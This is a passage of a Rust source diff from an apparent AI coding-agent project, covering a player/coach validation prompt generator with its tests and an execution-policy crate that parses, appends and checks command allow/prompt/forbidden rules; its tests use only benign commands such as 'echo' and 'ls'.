||||
/// The coach verifies the implementation against requirements and ignores player self-assessment.
|
||||
#[must_use]
|
||||
pub fn generate_coach_prompt(state: &DuoState) -> String {
|
||||
let mut prompt = String::new();
|
||||
|
||||
prompt.push_str("# Coach Phase - Validation\n\n");
|
||||
prompt.push_str("You are the COACH in an autocoding session. Your role is to VERIFY the implementation.\n\n");
|
||||
|
||||
prompt.push_str("## Requirements (Source of Truth)\n\n");
|
||||
prompt.push_str(&state.requirements);
|
||||
prompt.push_str("\n\n");
|
||||
|
||||
prompt.push_str(&format!(
|
||||
"## Session Info\n\n\
|
||||
- Turn: {}/{}\n\
|
||||
- Approval Threshold: {:.0}%\n\
|
||||
- Turns Remaining: {}\n",
|
||||
state.current_turn,
|
||||
state.max_turns,
|
||||
state.approval_threshold * 100.0,
|
||||
state.turns_remaining()
|
||||
));
|
||||
|
||||
if !state.quality_scores.is_empty() {
|
||||
let avg = state.average_quality_score().unwrap_or(0.0);
|
||||
prompt.push_str(&format!("- Average Quality: {:.1}%\n", avg * 100.0));
|
||||
}
|
||||
|
||||
prompt.push_str("\n## Instructions\n\n");
|
||||
prompt.push_str(
|
||||
"1. Review the current implementation against the requirements\n\
|
||||
2. Create a COMPLIANCE CHECKLIST:\n\
|
||||
- [ ] or [x] for each requirement item\n\
|
||||
- Note any missing or incorrect implementations\n\
|
||||
3. Calculate a COMPLIANCE SCORE (0.0 to 1.0)\n\
|
||||
4. IGNORE any player self-assessment or claims of completion\n\
|
||||
5. If score >= threshold AND all critical items pass:\n\
|
||||
- Output: COACH APPROVED\n\
|
||||
6. Otherwise, provide specific feedback:\n\
|
||||
- What is missing\n\
|
||||
- What needs to be fixed\n\
|
||||
- Actionable next steps\n\n\
|
||||
Begin validation now.\n",
|
||||
);
|
||||
|
||||
prompt
|
||||
}
|
||||
|
||||
/// Generate a summary of the session for system prompt injection.
|
||||
#[must_use]
|
||||
pub fn session_summary(session: &DuoSession) -> String {
|
||||
let mut lines = Vec::new();
|
||||
|
||||
if let Some(ref state) = session.active_state {
|
||||
lines.push(format!("Active Duo Session: {}", state.summary()));
|
||||
} else {
|
||||
lines.push("No active Duo session.".to_string());
|
||||
}
|
||||
|
||||
if !session.saved_states.is_empty() {
|
||||
lines.push(format!("Saved sessions: {}", session.saved_states.len()));
|
||||
for (id, state) in &session.saved_states {
|
||||
let name = state
|
||||
.session_name
|
||||
.as_deref()
|
||||
.unwrap_or(&id[..8.min(id.len())]);
|
||||
lines.push(format!(" - {}: {} ({})", name, state.status, state.phase));
|
||||
}
|
||||
}
|
||||
|
||||
lines.join("\n")
|
||||
}
|
||||
|
||||
// === Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
fn sample_requirements() -> String {
|
||||
"## Requirements\n\
|
||||
- [ ] Create a function `add(a, b)` that returns the sum\n\
|
||||
- [ ] Add unit tests for the function\n\
|
||||
- [ ] Document the function with comments"
|
||||
.to_string()
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_create_session() {
|
||||
let state = DuoState::create(
|
||||
sample_requirements(),
|
||||
Some("test-session".to_string()),
|
||||
None,
|
||||
None,
|
||||
);
|
||||
|
||||
assert_eq!(state.session_name, Some("test-session".to_string()));
|
||||
assert_eq!(state.current_turn, 1);
|
||||
assert_eq!(state.max_turns, 10);
|
||||
assert_eq!(state.phase, DuoPhase::Init);
|
||||
assert_eq!(state.status, DuoStatus::Active);
|
||||
assert!(state.turn_history.is_empty());
|
||||
assert!(state.last_coach_feedback.is_none());
|
||||
assert_eq!(state.approval_threshold, 0.9);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_advance_to_coach() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, None, None);
|
||||
|
||||
assert!(
|
||||
state
|
||||
.advance_to_coach("Implemented add function".to_string())
|
||||
.is_ok()
|
||||
);
|
||||
assert_eq!(state.phase, DuoPhase::Coach);
|
||||
assert_eq!(state.turn_history.len(), 1);
|
||||
assert_eq!(state.turn_history[0].phase, DuoPhase::Player);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_advance_turn_approved() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, None, None);
|
||||
state
|
||||
.advance_to_coach("Implemented everything".to_string())
|
||||
.unwrap();
|
||||
|
||||
assert!(
|
||||
state
|
||||
.advance_turn(
|
||||
"COACH APPROVED - All requirements met".to_string(),
|
||||
true,
|
||||
Some(0.95)
|
||||
)
|
||||
.is_ok()
|
||||
);
|
||||
|
||||
assert_eq!(state.phase, DuoPhase::Approved);
|
||||
assert_eq!(state.status, DuoStatus::Approved);
|
||||
assert!(state.is_complete());
|
||||
assert_eq!(state.quality_scores, vec![0.95]);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_advance_turn_continue() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, None, None);
|
||||
state
|
||||
.advance_to_coach("Partial implementation".to_string())
|
||||
.unwrap();
|
||||
|
||||
assert!(
|
||||
state
|
||||
.advance_turn("Missing tests".to_string(), false, Some(0.5))
|
||||
.is_ok()
|
||||
);
|
||||
|
||||
assert_eq!(state.phase, DuoPhase::Player);
|
||||
assert_eq!(state.status, DuoStatus::Active);
|
||||
assert_eq!(state.current_turn, 2);
|
||||
assert!(!state.is_complete());
|
||||
assert_eq!(state.last_coach_feedback, Some("Missing tests".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_timeout() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, Some(2), None);
|
||||
|
||||
// Turn 1
|
||||
state.advance_to_coach("Attempt 1".to_string()).unwrap();
|
||||
state
|
||||
.advance_turn("Not good enough".to_string(), false, Some(0.3))
|
||||
.unwrap();
|
||||
|
||||
// Turn 2 (max)
|
||||
state.advance_to_coach("Attempt 2".to_string()).unwrap();
|
||||
state
|
||||
.advance_turn("Still not good enough".to_string(), false, Some(0.4))
|
||||
.unwrap();
|
||||
|
||||
assert_eq!(state.phase, DuoPhase::Timeout);
|
||||
assert_eq!(state.status, DuoStatus::Timeout);
|
||||
assert!(state.is_complete());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_invalid_phase_transition() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, None, None);
|
||||
state.phase = DuoPhase::Approved;
|
||||
|
||||
let result = state.advance_to_coach("Should fail".to_string());
|
||||
assert!(result.is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_turns_remaining() {
|
||||
let state = DuoState::create(sample_requirements(), None, Some(10), None);
|
||||
assert_eq!(state.turns_remaining(), 9);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_average_quality_score() {
|
||||
let mut state = DuoState::create(sample_requirements(), None, None, None);
|
||||
assert!(state.average_quality_score().is_none());
|
||||
|
||||
state.quality_scores = vec![0.5, 0.7, 0.9];
|
||||
let avg = state.average_quality_score().unwrap();
|
||||
assert!((avg - 0.7).abs() < 0.001);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_session_container() {
|
||||
let mut session = DuoSession::new();
|
||||
|
||||
// Start first session
|
||||
session.start_session(
|
||||
sample_requirements(),
|
||||
Some("session-1".to_string()),
|
||||
None,
|
||||
None,
|
||||
);
|
||||
assert!(session.get_active().is_some());
|
||||
|
||||
// Start second session (first gets saved)
|
||||
session.start_session(
|
||||
"Other requirements".to_string(),
|
||||
Some("session-2".to_string()),
|
||||
None,
|
||||
None,
|
||||
);
|
||||
assert_eq!(session.saved_states.len(), 1);
|
||||
|
||||
// Get active
|
||||
let active = session.get_active().unwrap();
|
||||
assert_eq!(active.session_name, Some("session-2".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_player_prompt() {
|
||||
let state = DuoState::create(sample_requirements(), None, None, None);
|
||||
let prompt = generate_player_prompt(&state);
|
||||
|
||||
assert!(prompt.contains("Player Phase"));
|
||||
assert!(prompt.contains("Requirements (Source of Truth)"));
|
||||
assert!(prompt.contains("Turn: 1/10"));
|
||||
assert!(prompt.contains("DO NOT declare success"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_coach_prompt() {
|
||||
let state = DuoState::create(sample_requirements(), None, None, None);
|
||||
let prompt = generate_coach_prompt(&state);
|
||||
|
||||
assert!(prompt.contains("Coach Phase"));
|
||||
assert!(prompt.contains("COMPLIANCE CHECKLIST"));
|
||||
assert!(prompt.contains("COACH APPROVED"));
|
||||
assert!(prompt.contains("IGNORE any player self-assessment"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_shared_session() {
|
||||
let shared = new_shared_duo_session();
|
||||
|
||||
{
|
||||
let mut session = shared.lock().unwrap();
|
||||
session.start_session(sample_requirements(), None, None, None);
|
||||
}
|
||||
|
||||
{
|
||||
let session = shared.lock().unwrap();
|
||||
assert!(session.get_active().is_some());
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_summary() {
|
||||
let state = DuoState::create(sample_requirements(), Some("test".to_string()), None, None);
|
||||
let summary = state.summary();
|
||||
|
||||
assert!(summary.contains("Duo Session: test"));
|
||||
assert!(summary.contains("Phase: init"));
|
||||
assert!(summary.contains("Turn: 1/10"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_session_summary() {
|
||||
let mut session = DuoSession::new();
|
||||
session.start_session(
|
||||
sample_requirements(),
|
||||
Some("active-session".to_string()),
|
||||
None,
|
||||
None,
|
||||
);
|
||||
|
||||
let summary = session_summary(&session);
|
||||
assert!(summary.contains("Active Duo Session"));
|
||||
assert!(summary.contains("active-session"));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,227 @@
|
||||
#![allow(dead_code)]
|
||||
|
||||
use std::fs::OpenOptions;
|
||||
use std::io::Read;
|
||||
use std::io::Seek;
|
||||
use std::io::SeekFrom;
|
||||
use std::io::Write;
|
||||
use std::path::Path;
|
||||
use std::path::PathBuf;
|
||||
|
||||
use serde_json;
|
||||
use thiserror::Error;
|
||||
|
||||
#[derive(Debug, Error)]
|
||||
pub enum AmendError {
|
||||
#[error("prefix rule requires at least one token")]
|
||||
EmptyPrefix,
|
||||
#[error("policy path has no parent: {path}")]
|
||||
MissingParent { path: PathBuf },
|
||||
#[error("failed to create policy directory {dir}: {source}")]
|
||||
CreatePolicyDir {
|
||||
dir: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to format prefix tokens: {source}")]
|
||||
SerializePrefix { source: serde_json::Error },
|
||||
#[error("failed to open policy file {path}: {source}")]
|
||||
OpenPolicyFile {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to write to policy file {path}: {source}")]
|
||||
WritePolicyFile {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to lock policy file {path}: {source}")]
|
||||
LockPolicyFile {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to seek policy file {path}: {source}")]
|
||||
SeekPolicyFile {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to read policy file {path}: {source}")]
|
||||
ReadPolicyFile {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("failed to read metadata for policy file {path}: {source}")]
|
||||
PolicyMetadata {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
}
|
||||
|
||||
/// Note this thread uses advisory file locking and performs blocking I/O, so it should be used with
|
||||
/// [`tokio::task::spawn_blocking`] when called from an async context.
|
||||
pub fn blocking_append_allow_prefix_rule(
|
||||
policy_path: &Path,
|
||||
prefix: &[String],
|
||||
) -> Result<(), AmendError> {
|
||||
if prefix.is_empty() {
|
||||
return Err(AmendError::EmptyPrefix);
|
||||
}
|
||||
|
||||
let tokens = prefix
|
||||
.iter()
|
||||
.map(serde_json::to_string)
|
||||
.collect::<Result<Vec<_>, _>>()
|
||||
.map_err(|source| AmendError::SerializePrefix { source })?;
|
||||
let pattern = format!("[{}]", tokens.join(", "));
|
||||
let rule = format!(r#"prefix_rule(pattern={pattern}, decision="allow")"#);
|
||||
|
||||
let dir = policy_path
|
||||
.parent()
|
||||
.ok_or_else(|| AmendError::MissingParent {
|
||||
path: policy_path.to_path_buf(),
|
||||
})?;
|
||||
match std::fs::create_dir(dir) {
|
||||
Ok(()) => {}
|
||||
Err(ref source) if source.kind() == std::io::ErrorKind::AlreadyExists => {}
|
||||
Err(source) => {
|
||||
return Err(AmendError::CreatePolicyDir {
|
||||
dir: dir.to_path_buf(),
|
||||
source,
|
||||
});
|
||||
}
|
||||
}
|
||||
append_locked_line(policy_path, &rule)
|
||||
}
|
||||
|
||||
fn append_locked_line(policy_path: &Path, line: &str) -> Result<(), AmendError> {
|
||||
let mut file = OpenOptions::new()
|
||||
.create(true)
|
||||
.read(true)
|
||||
.append(true)
|
||||
.open(policy_path)
|
||||
.map_err(|source| AmendError::OpenPolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
file.lock().map_err(|source| AmendError::LockPolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
|
||||
let len = file
|
||||
.metadata()
|
||||
.map_err(|source| AmendError::PolicyMetadata {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?
|
||||
.len();
|
||||
|
||||
// Ensure file ends in a newline before appending.
|
||||
if len > 0 {
|
||||
file.seek(SeekFrom::End(-1))
|
||||
.map_err(|source| AmendError::SeekPolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
let mut last = [0; 1];
|
||||
file.read_exact(&mut last)
|
||||
.map_err(|source| AmendError::ReadPolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
|
||||
if last[0] != b'\n' {
|
||||
file.write_all(b"\n")
|
||||
.map_err(|source| AmendError::WritePolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
}
|
||||
}
|
||||
|
||||
file.write_all(format!("{line}\n").as_bytes())
|
||||
.map_err(|source| AmendError::WritePolicyFile {
|
||||
path: policy_path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use pretty_assertions::assert_eq;
|
||||
use tempfile::tempdir;
|
||||
|
||||
#[test]
|
||||
fn appends_rule_and_creates_directories() {
|
||||
let tmp = tempdir().expect("create temp dir");
|
||||
let policy_path = tmp.path().join("rules").join("default.rules");
|
||||
|
||||
blocking_append_allow_prefix_rule(
|
||||
&policy_path,
|
||||
&[String::from("echo"), String::from("Hello, world!")],
|
||||
)
|
||||
.expect("append rule");
|
||||
|
||||
let contents = std::fs::read_to_string(&policy_path).expect("default.rules should exist");
|
||||
assert_eq!(
|
||||
contents,
|
||||
r#"prefix_rule(pattern=["echo", "Hello, world!"], decision="allow")
|
||||
"#
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn appends_rule_without_duplicate_newline() {
|
||||
let tmp = tempdir().expect("create temp dir");
|
||||
let policy_path = tmp.path().join("rules").join("default.rules");
|
||||
std::fs::create_dir_all(policy_path.parent().unwrap()).expect("create policy dir");
|
||||
std::fs::write(
|
||||
&policy_path,
|
||||
r#"prefix_rule(pattern=["ls"], decision="allow")
|
||||
"#,
|
||||
)
|
||||
.expect("write seed rule");
|
||||
|
||||
blocking_append_allow_prefix_rule(
|
||||
&policy_path,
|
||||
&[String::from("echo"), String::from("Hello, world!")],
|
||||
)
|
||||
.expect("append rule");
|
||||
|
||||
let contents = std::fs::read_to_string(&policy_path).expect("read policy");
|
||||
assert_eq!(
|
||||
contents,
|
||||
r#"prefix_rule(pattern=["ls"], decision="allow")
|
||||
prefix_rule(pattern=["echo", "Hello, world!"], decision="allow")
|
||||
"#
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn inserts_newline_when_missing_before_append() {
|
||||
let tmp = tempdir().expect("create temp dir");
|
||||
let policy_path = tmp.path().join("rules").join("default.rules");
|
||||
std::fs::create_dir_all(policy_path.parent().unwrap()).expect("create policy dir");
|
||||
std::fs::write(
|
||||
&policy_path,
|
||||
r#"prefix_rule(pattern=["ls"], decision="allow")"#,
|
||||
)
|
||||
.expect("write seed rule without newline");
|
||||
|
||||
blocking_append_allow_prefix_rule(
|
||||
&policy_path,
|
||||
&[String::from("echo"), String::from("Hello, world!")],
|
||||
)
|
||||
.expect("append rule");
|
||||
|
||||
let contents = std::fs::read_to_string(&policy_path).expect("read policy");
|
||||
assert_eq!(
|
||||
contents,
|
||||
r#"prefix_rule(pattern=["ls"], decision="allow")
|
||||
prefix_rule(pattern=["echo", "Hello, world!"], decision="allow")
|
||||
"#
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,27 @@
|
||||
use serde::Deserialize;
|
||||
use serde::Serialize;
|
||||
|
||||
use super::error::Error;
|
||||
use super::error::Result;
|
||||
|
||||
#[derive(Clone, Copy, Debug, Eq, PartialEq, Ord, PartialOrd, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub enum Decision {
|
||||
/// Command may run without further approval.
|
||||
Allow,
|
||||
/// Request explicit user approval; rejected outright when running with `approval_policy="never"`.
|
||||
Prompt,
|
||||
/// Command is blocked without further consideration.
|
||||
Forbidden,
|
||||
}
|
||||
|
||||
impl Decision {
|
||||
pub fn parse(raw: &str) -> Result<Self> {
|
||||
match raw {
|
||||
"allow" => Ok(Self::Allow),
|
||||
"prompt" => Ok(Self::Prompt),
|
||||
"forbidden" => Ok(Self::Forbidden),
|
||||
other => Err(Error::InvalidDecision(other.to_string())),
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,28 @@
|
||||
use starlark::Error as StarlarkError;
|
||||
use thiserror::Error;
|
||||
|
||||
pub type Result<T> = std::result::Result<T, Error>;
|
||||
|
||||
#[derive(Debug, Error)]
|
||||
pub enum Error {
|
||||
#[error("invalid decision: {0}")]
|
||||
InvalidDecision(String),
|
||||
#[error("invalid pattern element: {0}")]
|
||||
InvalidPattern(String),
|
||||
#[error("invalid example: {0}")]
|
||||
InvalidExample(String),
|
||||
#[error("invalid rule: {0}")]
|
||||
InvalidRule(String),
|
||||
#[error(
|
||||
"expected every example to match at least one rule. rules: {rules:?}; unmatched examples: \
|
||||
{examples:?}"
|
||||
)]
|
||||
ExampleDidNotMatch {
|
||||
rules: Vec<String>,
|
||||
examples: Vec<String>,
|
||||
},
|
||||
#[error("expected example to not match rule `{rule}`: {example}")]
|
||||
ExampleDidMatch { rule: String, example: String },
|
||||
#[error("starlark error: {0}")]
|
||||
Starlark(StarlarkError),
|
||||
}
|
||||
@@ -0,0 +1,83 @@
|
||||
use std::fs;
|
||||
use std::path::PathBuf;
|
||||
|
||||
use anyhow::Context;
|
||||
use anyhow::Result;
|
||||
use clap::Parser;
|
||||
use serde::Serialize;
|
||||
|
||||
use super::Decision;
|
||||
use super::Policy;
|
||||
use super::PolicyParser;
|
||||
use super::RuleMatch;
|
||||
|
||||
/// Arguments for evaluating a command against one or more execpolicy files.
|
||||
#[derive(Debug, Parser, Clone)]
|
||||
pub struct ExecPolicyCheckCommand {
|
||||
/// Paths to execpolicy rule files to evaluate (repeatable).
|
||||
#[arg(short = 'r', long = "rules", value_name = "PATH", required = true)]
|
||||
pub rules: Vec<PathBuf>,
|
||||
|
||||
/// Pretty-print the JSON output.
|
||||
#[arg(long)]
|
||||
pub pretty: bool,
|
||||
|
||||
/// Command tokens to check against the policy.
|
||||
#[arg(
|
||||
value_name = "COMMAND",
|
||||
required = true,
|
||||
trailing_var_arg = true,
|
||||
allow_hyphen_values = true
|
||||
)]
|
||||
pub command: Vec<String>,
|
||||
}
|
||||
|
||||
impl ExecPolicyCheckCommand {
|
||||
/// Load the policies for this command, evaluate the command, and render JSON output.
|
||||
pub fn run(&self) -> Result<()> {
|
||||
let policy = load_policies(&self.rules)?;
|
||||
let matched_rules = policy.matches_for_command(&self.command, None);
|
||||
|
||||
let json = format_matches_json(&matched_rules, self.pretty)?;
|
||||
println!("{json}");
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
pub fn format_matches_json(matched_rules: &[RuleMatch], pretty: bool) -> Result<String> {
|
||||
let output = ExecPolicyCheckOutput {
|
||||
matched_rules,
|
||||
decision: matched_rules.iter().map(RuleMatch::decision).max(),
|
||||
};
|
||||
|
||||
if pretty {
|
||||
serde_json::to_string_pretty(&output).map_err(Into::into)
|
||||
} else {
|
||||
serde_json::to_string(&output).map_err(Into::into)
|
||||
}
|
||||
}
|
||||
|
||||
pub fn load_policies(policy_paths: &[PathBuf]) -> Result<Policy> {
|
||||
let mut parser = PolicyParser::new();
|
||||
|
||||
for policy_path in policy_paths {
|
||||
let policy_file_contents = fs::read_to_string(policy_path)
|
||||
.with_context(|| format!("failed to read policy at {}", policy_path.display()))?;
|
||||
let policy_identifier = policy_path.to_string_lossy().to_string();
|
||||
parser
|
||||
.parse(&policy_identifier, &policy_file_contents)
|
||||
.with_context(|| format!("failed to parse policy at {}", policy_path.display()))?;
|
||||
}
|
||||
|
||||
Ok(parser.build())
|
||||
}
|
||||
|
||||
#[derive(Serialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
struct ExecPolicyCheckOutput<'a> {
|
||||
#[serde(rename = "matchedRules")]
|
||||
matched_rules: &'a [RuleMatch],
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
decision: Option<Decision>,
|
||||
}
|
||||
@@ -0,0 +1,22 @@
|
||||
#![allow(unused_imports)]
|
||||
|
||||
pub mod amend;
|
||||
pub mod decision;
|
||||
pub mod error;
|
||||
pub mod execpolicycheck;
|
||||
pub mod parser;
|
||||
pub mod policy;
|
||||
pub mod rule;
|
||||
|
||||
pub use amend::AmendError;
|
||||
pub use amend::blocking_append_allow_prefix_rule;
|
||||
pub use decision::Decision;
|
||||
pub use error::Error;
|
||||
pub use error::Result;
|
||||
pub use execpolicycheck::ExecPolicyCheckCommand;
|
||||
pub use parser::PolicyParser;
|
||||
pub use policy::Evaluation;
|
||||
pub use policy::Policy;
|
||||
pub use rule::Rule;
|
||||
pub use rule::RuleMatch;
|
||||
pub use rule::RuleRef;
|
||||
@@ -0,0 +1,269 @@
|
||||
use multimap::MultiMap;
|
||||
use shlex;
|
||||
use starlark::any::ProvidesStaticType;
|
||||
use starlark::environment::GlobalsBuilder;
|
||||
use starlark::environment::Module;
|
||||
use starlark::eval::Evaluator;
|
||||
use starlark::starlark_module;
|
||||
use starlark::syntax::AstModule;
|
||||
use starlark::syntax::Dialect;
|
||||
use starlark::values::Value;
|
||||
use starlark::values::list::ListRef;
|
||||
use starlark::values::list::UnpackList;
|
||||
use starlark::values::none::NoneType;
|
||||
use std::cell::RefCell;
|
||||
use std::cell::RefMut;
|
||||
use std::sync::Arc;
|
||||
|
||||
use super::decision::Decision;
|
||||
use super::error::Error;
|
||||
use super::error::Result;
|
||||
use super::rule::PatternToken;
|
||||
use super::rule::PrefixPattern;
|
||||
use super::rule::PrefixRule;
|
||||
use super::rule::RuleRef;
|
||||
use super::rule::validate_match_examples;
|
||||
use super::rule::validate_not_match_examples;
|
||||
|
||||
pub struct PolicyParser {
|
||||
builder: RefCell<PolicyBuilder>,
|
||||
}
|
||||
|
||||
impl Default for PolicyParser {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl PolicyParser {
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
builder: RefCell::new(PolicyBuilder::new()),
|
||||
}
|
||||
}
|
||||
|
||||
/// Parses a policy, tagging parser errors with `policy_identifier` so failures include the
|
||||
/// identifier alongside line numbers.
|
||||
pub fn parse(&mut self, policy_identifier: &str, policy_file_contents: &str) -> Result<()> {
|
||||
let mut dialect = Dialect::Extended.clone();
|
||||
dialect.enable_f_strings = true;
|
||||
let ast = AstModule::parse(
|
||||
policy_identifier,
|
||||
policy_file_contents.to_string(),
|
||||
&dialect,
|
||||
)
|
||||
.map_err(Error::Starlark)?;
|
||||
let globals = GlobalsBuilder::standard().with(policy_builtins).build();
|
||||
let module = Module::new();
|
||||
{
|
||||
let mut eval = Evaluator::new(&module);
|
||||
eval.extra = Some(&self.builder);
|
||||
eval.eval_module(ast, &globals).map_err(Error::Starlark)?;
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn build(self) -> super::policy::Policy {
|
||||
self.builder.into_inner().build()
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Debug, ProvidesStaticType)]
|
||||
struct PolicyBuilder {
|
||||
rules_by_program: MultiMap<String, RuleRef>,
|
||||
}
|
||||
|
||||
impl PolicyBuilder {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
rules_by_program: MultiMap::new(),
|
||||
}
|
||||
}
|
||||
|
||||
fn add_rule(&mut self, rule: RuleRef) {
|
||||
self.rules_by_program
|
||||
.insert(rule.program().to_string(), rule);
|
||||
}
|
||||
|
||||
fn build(self) -> super::policy::Policy {
|
||||
super::policy::Policy::new(self.rules_by_program)
|
||||
}
|
||||
}
|
||||
|
||||
fn parse_pattern<'v>(pattern: UnpackList<Value<'v>>) -> Result<Vec<PatternToken>> {
|
||||
let tokens: Vec<PatternToken> = pattern
|
||||
.items
|
||||
.into_iter()
|
||||
.map(parse_pattern_token)
|
||||
.collect::<Result<_>>()?;
|
||||
if tokens.is_empty() {
|
||||
Err(Error::InvalidPattern("pattern cannot be empty".to_string()))
|
||||
} else {
|
||||
Ok(tokens)
|
||||
}
|
||||
}
|
||||
|
||||
fn parse_pattern_token<'v>(value: Value<'v>) -> Result<PatternToken> {
|
||||
if let Some(s) = value.unpack_str() {
|
||||
Ok(PatternToken::Single(s.to_string()))
|
||||
} else if let Some(list) = ListRef::from_value(value) {
|
||||
let tokens: Vec<String> = list
|
||||
.content()
|
||||
.iter()
|
||||
.map(|value| {
|
||||
value
|
||||
.unpack_str()
|
||||
.ok_or_else(|| {
|
||||
Error::InvalidPattern(format!(
|
||||
"pattern alternative must be a string (got {})",
|
||||
value.get_type()
|
||||
))
|
||||
})
|
||||
.map(str::to_string)
|
||||
})
|
||||
.collect::<Result<_>>()?;
|
||||
|
||||
match tokens.as_slice() {
|
||||
[] => Err(Error::InvalidPattern(
|
||||
"pattern alternatives cannot be empty".to_string(),
|
||||
)),
|
||||
[single] => Ok(PatternToken::Single(single.clone())),
|
||||
_ => Ok(PatternToken::Alts(tokens)),
|
||||
}
|
||||
} else {
|
||||
Err(Error::InvalidPattern(format!(
|
||||
"pattern element must be a string or list of strings (got {})",
|
||||
value.get_type()
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
fn parse_examples<'v>(examples: UnpackList<Value<'v>>) -> Result<Vec<Vec<String>>> {
|
||||
examples.items.into_iter().map(parse_example).collect()
|
||||
}
|
||||
|
||||
fn parse_example<'v>(value: Value<'v>) -> Result<Vec<String>> {
|
||||
if let Some(raw) = value.unpack_str() {
|
||||
parse_string_example(raw)
|
||||
} else if let Some(list) = ListRef::from_value(value) {
|
||||
parse_list_example(list)
|
||||
} else {
|
||||
Err(Error::InvalidExample(format!(
|
||||
"example must be a string or list of strings (got {})",
|
||||
value.get_type()
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
fn parse_string_example(raw: &str) -> Result<Vec<String>> {
|
||||
let tokens = shlex::split(raw).ok_or_else(|| {
|
||||
Error::InvalidExample("example string has invalid shell syntax".to_string())
|
||||
})?;
|
||||
|
||||
if tokens.is_empty() {
|
||||
Err(Error::InvalidExample(
|
||||
"example cannot be an empty string".to_string(),
|
||||
))
|
||||
} else {
|
||||
Ok(tokens)
|
||||
}
|
||||
}
|
||||
|
||||
fn parse_list_example(list: &ListRef) -> Result<Vec<String>> {
|
||||
let tokens: Vec<String> = list
|
||||
.content()
|
||||
.iter()
|
||||
.map(|value| {
|
||||
value
|
||||
.unpack_str()
|
||||
.ok_or_else(|| {
|
||||
Error::InvalidExample(format!(
|
||||
"example tokens must be strings (got {})",
|
||||
value.get_type()
|
||||
))
|
||||
})
|
||||
.map(str::to_string)
|
||||
})
|
||||
.collect::<Result<_>>()?;
|
||||
|
||||
if tokens.is_empty() {
|
||||
Err(Error::InvalidExample(
|
||||
"example cannot be an empty list".to_string(),
|
||||
))
|
||||
} else {
|
||||
Ok(tokens)
|
||||
}
|
||||
}
|
||||
|
||||
fn policy_builder<'v, 'a>(eval: &Evaluator<'v, 'a, '_>) -> RefMut<'a, PolicyBuilder> {
|
||||
#[expect(clippy::expect_used)]
|
||||
eval.extra
|
||||
.as_ref()
|
||||
.expect("policy_builder requires Evaluator.extra to be populated")
|
||||
.downcast_ref::<RefCell<PolicyBuilder>>()
|
||||
.expect("Evaluator.extra must contain a PolicyBuilder")
|
||||
.borrow_mut()
|
||||
}
|
||||
|
||||
#[starlark_module]
|
||||
fn policy_builtins(builder: &mut GlobalsBuilder) {
|
||||
fn prefix_rule<'v>(
|
||||
pattern: UnpackList<Value<'v>>,
|
||||
decision: Option<&'v str>,
|
||||
r#match: Option<UnpackList<Value<'v>>>,
|
||||
not_match: Option<UnpackList<Value<'v>>>,
|
||||
justification: Option<&'v str>,
|
||||
eval: &mut Evaluator<'v, '_, '_>,
|
||||
) -> anyhow::Result<NoneType> {
|
||||
let decision = match decision {
|
||||
Some(raw) => Decision::parse(raw)?,
|
||||
None => Decision::Allow,
|
||||
};
|
||||
|
||||
let justification = match justification {
|
||||
Some(raw) if raw.trim().is_empty() => {
|
||||
